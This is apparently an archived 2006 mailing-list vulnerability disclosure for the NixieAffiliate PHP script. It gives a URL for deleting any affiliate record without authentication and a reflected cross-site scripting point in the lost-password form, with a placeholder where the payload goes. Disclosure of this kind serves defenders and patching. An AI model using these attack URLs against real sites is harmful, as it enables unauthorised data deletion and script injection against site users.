NixieAffiliate all version bypass admin and xss

From: ali@xxxxxxxxxx
Date: 16 Sep 2006 22:30:22 -0000

NixieAffiliate all version
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
Bypass for delete any aff ID :>>
www.domain.com/NixieAffiliate/delete.php?id=1
Xss :>>
www.domain.com/NixieAffiliate/forms/lostpassword.php?error=[xss]

Prev by Date: HitWeb v3.0 - Remote File Include Vulnerabilities
Next by Date: PHPQuiz Multiple Remote Vulnerabilites
Previous by thread: HitWeb v3.0 - Remote File Include Vulnerabilities
Next by thread: PHPQuiz Multiple Remote Vulnerabilites
Index(es):
- Date
- Thread

Relevant Pages

Re: [Full-disclosure] Cross site scripting issues in s9y (CVE-2008-1386, CVE-2008
... Cross Site Scripting (XSS) in serendipity 1.3 referrer plugin, ... 2008-03-18 Vendor contacted ...
(Full-Disclosure)
Re: [Full-disclosure] Cross site scripting issues in s9y (CVE-2008-1386, CVE-2008
... Cross Site Scripting (XSS) in serendipity 1.3 referrer plugin, ... In the referrer plugin of the blog application serendipity, ... 2008-03-18 Vendor contacted ... It's licensed under the creative commons attribution license. ...
(Full-Disclosure)
Sonexis ConferenceManager Multiple Cross-site Scripting (XSS) Vulnerabilities
... Vulnerability title: Sonexis ConferenceManager Multiple Cross-site Scripting (XSS) Vulnerabilities ... Application Vendor: Sonexis ...
(Bugtraq)
lostBook v1.1 Javascript Execution
... Vendor Notice ... Ok the only reason i consider this javascript execution instead of XSS. ... The Email and Website feild go through no filtering, and a malicous hacker could use that to insert javascript. ...
(Bugtraq)
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
... Vendor Response: 2/18/2010 ... Vice President- San Diego Information Audit & Control Association ... OWASP Cross-Site Scripting (XSS) Attack Discussion ... Rsnake's Cross-Site Scripting Attack Cheat sheet ...
(Bugtraq)